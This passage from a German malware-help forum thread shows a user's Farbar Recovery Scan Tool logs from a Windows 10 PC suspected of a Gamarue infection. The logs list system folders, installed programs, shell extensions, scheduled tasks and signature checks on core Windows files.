2016-02-11 22:02 - 00000000 ____D C:\WINDOWS\system32\NV 2017-06-08 09:05 - 2015-10-30 08:28 - 00000000 ____D C:\Users\Default.migrated 2017-06-08 09:02 - 2017-05-28 09:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype 2017-06-08 09:02 - 2017-03-20 06:42 - 00000000 ____D C:\WINDOWS\OCR 2017-06-08 09:02 - 2017-03-20 06:41 - 00000000 ____D C:\WINDOWS\SysWOW64\sysprep 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 __SHD C:\Program Files (x86)\Windows Sidebar 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\IME 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\NDF 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\IME 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\schemas 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions 2017-06-08 09:02 - 2017-03-13 19:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Itoo Software 2017-06-08 09:02 - 2016-11-15 23:08 - 00000000 ___HD C:\WINDOWS\system32\WLANProfiles 2017-06-08 09:02 - 2016-10-22 10:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexicon 2017-06-08 09:02 - 2016-10-22 09:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IK Multimedia 2017-06-08 09:02 - 2016-07-15 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo 2017-06-08 09:02 - 2016-05-07 11:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel 2017-06-08 09:02 - 2016-04-21 21:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chaos Group 2017-06-08 09:02 - 2016-04-21 18:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk Backburner 2015 2017-06-08 09:02 - 2016-02-12 20:24 - 00000000 ____D C:\WINDOWS\SysWOW64\sda 2017-06-08 09:02 - 2016-02-11 22:02 - 00000000 ____D 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 __SHD C:\Program Files\Windows Sidebar
2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\inetsrv
2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-06-08 09:01 - 2017-03-13 19:32 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Itoo Software
2017-06-08 09:00 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-06-08 09:00 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Help
2017-06-08 09:00 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-06-08 08:59 - 2016-02-11 20:23 - 00000000 ____D C:\Intel
2017-06-04 11:47 - 2016-10-16 17:44 - 00000000 ____D C:\Users\ararat\Documents\Wohnung

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-08-02 21:46 - 2017-04-03 21:08 - 0000132 _____ () C:\Users\ararat\AppData\Roaming\Adobe PNG Format CS6 Prefs
2016-11-04 00:45 - 2017-03-10 23:52 - 0001456 _____ () C:\Users\ararat\AppData\Local\Adobe Save for Web 13.0 Prefs
2017-07-04 09:44 - 2017-07-04 09:44 - 0000000 ____H () C:\ProgramData\cm-lock
2017-06-08 08:59 - 2017-06-08 08:59 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Einige Dateien in TEMP:
====================
2017-06-27 22:40 - 2017-03-18 22:58 - 0830464 _____ (Microsoft Corporation) C:\Users\ararat\AppData\Local\Temp\cdo3360657184.dll
2017-06-26 21:53 - 2017-03-18 22:58 - 0830464 _____ (Microsoft Corporation) C:\Users\ararat\AppData\Local\Temp\cdo738377283.dll

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-07-03 01:25

==================== Ende von FRST.txt ============================ |
04.07.2017, 20:52 | #13 |
| Windows 10 - Gamarue Still step 3: Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 03-07-2017 01
durchgeführt von ararat (04-07-2017 21:42:21)
Gestartet von C:\Users\ararat\Desktop
Windows 10 Pro Version 1703 (X64) (2017-06-08 07:11:14)
Start-Modus: Normal
==========================================================

==================== Konten: =============================

Administrator (S-1-5-21-3349751938-1204465652-1694021483-500 - Administrator - Disabled)
ararat (S-1-5-21-3349751938-1204465652-1694021483-1000 - Administrator - Enabled) => C:\Users\ararat
DefaultAccount (S-1-5-21-3349751938-1204465652-1694021483-503 - Limited - Disabled)
Gast (S-1-5-21-3349751938-1204465652-1694021483-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3349751938-1204465652-1694021483-1002 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
3DStudio Import 18 GER (HKLM\...\063FFF2FFF18FF00FF0201F01F02F000-R1) (Version: 18.0 - Graphisoft) Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated) Adobe Flash Player 21 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 21.0.0.213 - Adobe Systems Incorporated) Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated) AmpegSVX (HKLM-x32\...\{CF1D7323-8A0A-49C7-83B0-088DB90721E2}) (Version: 1.1.0 - IK Multimedia) AmpliTube 3 (HKLM-x32\...\{5DD152A8-BFB3-439E-90CD-5C00C2116E23}) (Version: 3.0.1 - IK Multimedia) ArchiCAD 18 GER (HKLM\...\001FFF2FFF18FF00FF0201F01F02F000-R1) (Version: 18.0 - GRAPHISOFT) Autodesk 3ds Max 2015 (HKLM\...\{52B37EC7-D836-0410-0264-3C24BCED2010}) (Version: 17.0.630.0 - Autodesk) Hidden Autodesk 3ds Max 2015 (HKLM\...\Autodesk 3ds Max 2015) (Version: 17.0.630.0 - Autodesk) Autodesk 3ds Max 2015 Populate Data (HKLM\...\{57E92DED-DC6C-41E5-B9E1-76D83BD2EABE}) (Version: 17.0.0.0 - Autodesk) Autodesk Application Manager (HKLM-x32\...\Autodesk Application Manager) (Version: 1.0.59.0 - Autodesk) Autodesk Backburner 2015 (HKLM-x32\...\{8C5F38D2-8EFE-49A4-B3F5-BF3210FED168}) (Version: 15.0.0.0 - Autodesk) Autodesk DirectConnect 2015 64-bit (HKLM\...\{23C9ED7C-CB64-45FE-A7EA-1BA666F5589D}) (Version: 9.0.56.4 - Autodesk) Hidden Autodesk DirectConnect 2015 64-bit (HKLM\...\Autodesk DirectConnect 2015 64-bit) (Version: 9.0.56.4 - Autodesk) Autodesk Inventor Server Engine for 3ds Max 2015 (HKLM\...\{9167CA34-4E48-49E3-8892-3C439739D2D3}) (Version: 17.0 - Autodesk) Autodesk Material Library 2015 (HKLM-x32\...\{427F733F-4D6C-45BC-9324-EB743104C321}) (Version: 5.2.9.100 - Autodesk) Autodesk Material Library Base Resolution Image Library 2015 (HKLM-x32\...\{ABE2F70B-8D94-44E9-AA04-F0DB35063D62}) (Version: 
5.2.9.100 - Autodesk) Autodesk Material Library Medium Resolution Image Library 2015 (HKLM-x32\...\{9F6466D9-6EFC-4A10-B931-C72D1A3F1763}) (Version: 5.2.9.100 - Autodesk) Autodesk Revit Interoperability for 3ds Max 2015 (HKLM\...\{0BB716E0-1500-0610-0000-097DC2F354DF}) (Version: 15.0.107.0 - Autodesk) Hidden Autodesk Revit Interoperability for 3ds Max 2015 (HKLM\...\Autodesk Revit Interoperability for 3ds Max 2015) (Version: 15.0.107.0 - Autodesk) CodeMeter Runtime Kit v5.10a (HKLM\...\{CADFF08A-A157-474F-B6A8-8F26F81F7ABE}) (Version: 5.10.1224.501 - WIBU-SYSTEMS AG) Dolby Digital Plus Advanced Audio (HKLM\...\{B0BFC63F-EA07-419E-960B-3FB2ED5DD0B2}) (Version: 7.6.3.1 - Dolby Laboratories Inc) Dropbox (HKLM-x32\...\Dropbox) (Version: 29.4.20 - Dropbox, Inc.) Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.59.1 - Dropbox, Inc.) Hidden Forest Pack Pro 4.3.6 (HKLM-x32\...\Forest Pack Pro) (Version: 4.3.6 - Itoo Software) Intel Collaborative Processor Performance Control (HKLM-x32\...\0E7DAF70-FB54-4B91-B192-7E771C25AEEB) (Version: 1.0.0.1018 - Intel Corporation) Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.3.1184 - Intel Corporation) Intel(R) Network Connections Drivers (HKLM\...\PROSet) (Version: 20.2 - Intel) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation) Intel(R) Wireless Bluetooth(R)(patch version 17.1.1532.1813) (HKLM\...\{302600C1-6BDF-4FD1-1507-148929CC1385}) (Version: 17.1.1507.0532 - Intel Corporation) Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{f5d71765-7cd1-4e68-998f-5b379e725da3}) (Version: 10.0.22 - Intel(R) Corporation) Hidden Intel® PROSet/Wireless Software (HKLM-x32\...\{185db067-38cd-4521-a43e-c39b96ee1389}) (Version: 19.50.1 - Intel Corporation) Java 7 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217051FF}) (Version: 7.0.510 - Oracle) Lenovo Anzeige am Bildschirm 
(HKLM\...\OnScreenDisplay) (Version: 8.80.10 - Lenovo) Hidden Lenovo Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.67.12.16 - Lenovo) Hidden Lenovo QuickOptimizer (HKLM\...\{8D2C871B-1B9F-45AC-9C43-2BB18089CDFA}) (Version: 1.0.022.00 - Lenovo) Lenovo Settings - Power (HKLM-x32\...\{A6CFC34A-56EE-4AF5-8C49-995F59E6A160}) (Version: 2.00.000 - Lenovo) Hidden Lenovo Solution Center (HKLM\...\{C1FC707B-AE6B-4DC4-89A5-6628A01F8103}) (Version: 3.3.003.00 - Lenovo) Lenovo System Interface Foundation Driver (HKLM\...\{C2E5CA37-C862-4A69-AC6D-24F450A20C16}) (Version: 1.0.078.00 - Lenovo) Lexicon Omega Driver (HKLM\...\{2A837CDD-8FD6-4287-B82E-0664C90BB15A}) (Version: 2.7 - Lexicon) Hidden Lexicon Omega Driver (HKLM-x32\...\Lexicon Omega Driver) (Version: 2.7 - Lexicon) Metric Collection SDK (HKLM-x32\...\{DDAA788F-52E6-44EA-ADB8-92837B11BF26}) (Version: 1.1.0008.00 - Lenovo Group Limited) Hidden Microsoft OneDrive (HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\OneDriveSetup.exe) (Version: 17.3.6917.0607 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) 
(Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual 
C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) NVIDIA 3D Vision Treiber 354.45 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 354.45 - NVIDIA Corporation) NVIDIA Grafiktreiber 354.45 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 354.45 - NVIDIA Corporation) NVIDIA Update 10.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 10.4.0 - NVIDIA Corporation) NVIDIA WMI 2.22.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVWMI) (Version: 2.22.0 - NVIDIA Corporation) OpenOffice 4.1.2 (HKLM-x32\...\{F5CAB1AF-7B1A-4CEC-B829-A3F699473AE1}) (Version: 4.12.9782 - Apache Software Foundation) Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.21236 - Realtek Semiconductor Corp.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7614 - Realtek Semiconductor Corp.) Rhinoceros 5 (64-bit) (HKLM\...\{141B55B6-73E2-4F3F-9F59-7C477F186311}) (Version: 5.7.31207.07545 - Robert McNeel & Associates) ScummVM 1.8.0 (HKLM-x32\...\ScummVM_is1) (Version: - The ScummVM Team) Skype™ 7.36 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.36.101 - Skype Technologies S.A.) 
Spotify (HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\Spotify) (Version: 1.0.56.451.gb2f539fc - Spotify AB) SRWare Iron (64-Bit) Version 48.2550.0 (HKLM\...\{BA85A29D-B48E-4826-BAEE-817024E52E29}_is1) (Version: 48.2550.0 - SRWare) Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.17.115 - Synaptics Incorporated) TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH) TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.72365 - TeamViewer) ThinkPad Settings Dependency (HKLM\...\{08515684-CE49-47EF-B509-326A2E91BC5C}_is1) (Version: 3.0.1.29 - Lenovo) Hidden T-RackS 3 Deluxe (HKLM-x32\...\{423C4130-EBC3-410A-B3A0-37BBF9D607D5}) (Version: 1.0.0 - IK Multimedia) V-Ray for 3dsmax 2015 for x64 (HKLM\...\V-Ray for 3dsmax 2015 for x64) (Version: 3.20.03 - Chaos Software Ltd) WibuKey Setup (WibuKey Remove) (HKLM\...\{00060000-0000-1004-8002-0000C06B5161}) (Version: Version 6.20 of 2013-Dec-18 (Build 1230) (Setup) - WIBU-SYSTEMS AG) Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation) WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
CustomCLSID: HKU\S-1-5-21-3349751938-1204465652-1694021483-1000_Classes\CLSID\{073CB204-6B29-46FC-AB98-451F1D068741}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => Keine Datei CustomCLSID: HKU\S-1-5-21-3349751938-1204465652-1694021483-1000_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => Keine Datei CustomCLSID: HKU\S-1-5-21-3349751938-1204465652-1694021483-1000_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => Keine Datei ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) 
ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) 
ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.) ContextMenuHandlers01: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ContextMenuHandlers01: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-02-04] (Alexander Roshal) ContextMenuHandlers01: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Keine Datei ContextMenuHandlers04: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ContextMenuHandlers05: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.) ContextMenuHandlers05: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Keine Datei ContextMenuHandlers05: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2016-11-02] (Intel Corporation) ContextMenuHandlers05: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-05-01] (NVIDIA Corporation) ContextMenuHandlers06: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-02-04] (Alexander Roshal) ContextMenuHandlers06: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Keine Datei ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
Task: {01D9090E-055B-47E6-9237-48A7AD893313} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe Task: {0348AA56-036B-49BD-ACA5-651D76113425} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG Task: {0B8AB8F7-A8C8-4648-837B-724FD28BB7EB} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {125C8702-F8E9-4607-A69A-827C81E217F3} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-02-23] (Dropbox, Inc.) Task: {196313D9-F94B-4EBB-A563-871CC95A244F} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe Task: {20C24C14-DEEC-4084-8BC1-45364FEE0E6C} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe Task: {2193CD8C-D45A-4571-AC73-2AFF7DDDCD65} - System32\Tasks\{D47AB256-778C-4756-BFF4-B5F38C8A441A} => pcalua.exe -a "C:\Program Files\World of Warcraft 1.12.1\WoW.exe" -d "C:\Program Files\World of Warcraft 1.12.1" Task: {233D0047-31A5-40DE-8BC9-FCF166E1E548} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe Task: {25DAF7F8-2048-43D9-9CA3-C335828F4532} - System32\Tasks\{C33EC7F1-7E6C-4635-A9D8-DE9B48C4F5F2} => pcalua.exe -a "C:\Program Files\World of Warcraft 2.4.3\Wow.exe" -d "C:\Program Files\World of Warcraft 2.4.3" Task: {26E35CD2-4209-4156-AC41-5EBDBC503A9E} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\b4a09fe9-f559-4471-9e27-ab3aab0455dd => C:\Program 